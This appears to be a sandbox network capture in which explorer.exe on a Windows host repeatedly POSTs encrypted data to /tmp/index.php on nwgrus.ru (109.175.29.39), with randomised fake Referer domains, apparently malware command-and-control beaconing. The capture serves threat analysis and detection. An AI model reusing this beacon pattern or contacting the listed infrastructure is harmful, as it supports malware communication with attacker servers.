Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:19:57.944235086 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xghchnsekruohq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 111
Host: nwgrus.ru
Oct 8, 2024 00:19:57.944255114 CEST | 111 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 66 33 a8 a3
Oct 8, 2024 00:19:58.701877117 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:19:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:19:58.710067034 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://sexbgcirilxygdjd.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: nwgrus.ru
Oct 8, 2024 00:19:58.710134983 CEST | 362 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 53 38 ae 84
Oct 8, 2024 00:19:59.466635942 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:19:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:19:59.474740028 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://iahhcvfewaqau.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 159
Host: nwgrus.ru
Oct 8, 2024 00:19:59.474785089 CEST | 159 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4c 1d ab b9
Oct 8, 2024 00:20:00.843122959 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:00 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49741 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:00.851763964 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eqcqgpejtwdt.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 197
Host: nwgrus.ru
Oct 8, 2024 00:20:00.851783991 CEST | 197 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2b 3f a8 83
Oct 8, 2024 00:20:01.602030993 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:01 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49742 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:01.611601114 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wecknsvepmdnww.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 118
Host: nwgrus.ru
Oct 8, 2024 00:20:01.611614943 CEST | 118 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 4a 21 ef 81
Oct 8, 2024 00:20:02.372348070 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49743        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:02.449340105 CEST | Bytes transferred: 282 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bhtdcxedsrrbqyo.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 125
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:02.449341059 CEST | Bytes transferred: 125 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 60 58 b4 84
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu`Xt7SXhWP*:&`3
Timestamp: Oct 8, 2024 00:20:03.356353045 CEST | Bytes transferred: 484 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:03 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.4  49744        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:03.457595110 CEST | Bytes transferred: 283 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fdkltibbufmpdfhy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 188
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:03.458580971 CEST | Bytes transferred: 188 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 58 53 a8 e2
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuXSWhLyr(s|I)V<cOR(7AC6MM$ymjBf
Timestamp: Oct 8, 2024 00:20:04.230143070 CEST | Bytes transferred: 484 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.4  49745        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:04.240966082 CEST | Bytes transferred: 278 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xbdoluaokmu.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 251
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:04.241074085 CEST | Bytes transferred: 251 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 22 f9 f1
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu5"xPKDJw(w[;0gKCA&-OM3d{RBwRB.AB8-UNYIO'jt}7U"n*^,4
Timestamp: Oct 8, 2024 00:20:05.016217947 CEST | Bytes transferred: 137 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:04 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
10          192.168.2.4  49746        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:05.028496027 CEST | Bytes transferred: 281 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ayakqtnprwclxx.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 263
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:05.028522015 CEST | Bytes transferred: 263 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 63 5a a6 99
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vucZwqC!o0}D/+]DW{0$'E$UdTD]tW!{G3kmogj*4a\76J4
Timestamp: Oct 8, 2024 00:20:05.781755924 CEST | Bytes transferred: 484 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
11          192.168.2.4  49747        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:05.793008089 CEST | Bytes transferred: 282 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://iplbmyqhcsowave.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 241
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:05.793045044 CEST | Bytes transferred: 241 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 26 35 f1 92
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu&57mZcIo({'A`q}h3!Tz#T$x`3qd93^,AB~ZN*N]Prucp3z
Timestamp: Oct 8, 2024 00:20:06.618855953 CEST | Bytes transferred: 484 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:06 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.4  49748        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:06.632400036 CEST | Bytes transferred: 282 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rdhamasxmtwwkau.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 306
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:06.632436991 CEST | Bytes transferred: 306 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 4a 45 e3 a8
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuJE[]pj|56:ibx3c_GVTFU*ofVbs9$RY?0fjz7&)b~GaxSMj@p.5
Timestamp: Oct 8, 2024 00:20:07.424420118 CEST | Bytes transferred: 484 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.4  49749        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:07.434107065 CEST | Bytes transferred: 281 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://floxumtvcvrlyy.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 256
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:07.434158087 CEST | Bytes transferred: 256 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 2d 5d bc 97
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu-]nRwZU5JK+Cac1-t]WBlONfa8$4R'R/p&&(Bgdd?uB.L$v
Timestamp: Oct 8, 2024 00:20:08.185679913 CEST | Bytes transferred: 484 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.4  49750        109.175.29.39   80                2580  C:\Windows\explorer.exe

Timestamp: Oct 8, 2024 00:20:08.205815077 CEST | Bytes transferred: 282 | Direction: OUT
Data:
POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://mjtfeuwpovhathn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 112
Host: nwgrus.ru
Timestamp: Oct 8, 2024 00:20:08.205854893 CEST | Bytes transferred: 112 | Direction: OUT
Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 2f 3e a8 8c
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu/>}D!DIcyX
Timestamp: Oct 8, 2024 00:20:08.987888098 CEST | Bytes transferred: 137 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49751 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:08.997863054 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nggsthvsetexec.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 255
Host: nwgrus.ru
Oct 8, 2024 00:20:08.997879982 CEST | 255 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 28 2e d2 e0
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu(.MMbDco L+nhqP8>b"A9M\8,wg9*v[>z<n~xOlSc<&$hpZXFqf`zm
Oct 8, 2024 00:20:09.998981953 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49752 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:10.009479046 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lrkgjwlbfxyrmp.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 225
Host: nwgrus.ru
Oct 8, 2024 00:20:10.009502888 CEST | 225 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 43 0d ee ff
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuCM4@R`n1`9u3ytw[88J*N->H]Xrb"a4{wSA8')?:4Dn
Oct 8, 2024 00:20:10.795332909 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:10 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49753 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:10.804972887 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://wvxsqrgovrq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 205
Host: nwgrus.ru
Oct 8, 2024 00:20:10.804992914 CEST | 205 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 46 34 a1 f9
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuF4[W\r}'@{OKhed6_Ls':>sZ'U5gS%N$VSQ/
Oct 8, 2024 00:20:11.584964037 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49754 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:11.597956896 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ivjlkhscvhyfno.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 151
Host: nwgrus.ru
Oct 8, 2024 00:20:11.597990990 CEST | 151 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 45 5d fc ae
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vuE]M2yaV}v`/A,WW)b{|HY%KR(BPUw
Oct 8, 2024 00:20:12.351321936 CEST | 484 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49755 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:12.361294985 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gwvqwjkmpeg.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 204
Host: nwgrus.ru
Oct 8, 2024 00:20:12.361305952 CEST | 204 | OUT | Data Raw: 3b 6e 50 11 f1 cb 1a 55 dd ae c6 70 73 09 7a ce 0b 02 c1 97 1e 07 92 11 08 7a 78 97 47 c5 b2 6b 98 5b b6 2e 75 1a 27 1d 9b 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 2e 09 a4 b6
Data Ascii: ;nPUpszzxGk[.u'? 9Yt M@NA -[k,vu.vNbkv!=.kM`3xE*M]gEQ2bbI8SrR,[iH
Oct 8, 2024 00:20:13.116003990 CEST | 137 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.0
Date: Mon, 07 Oct 2024 22:20:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49756 | 109.175.29.39 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 00:20:13.360466957 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cqnqsxdlukmk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 302
Host: nwgrus.ru
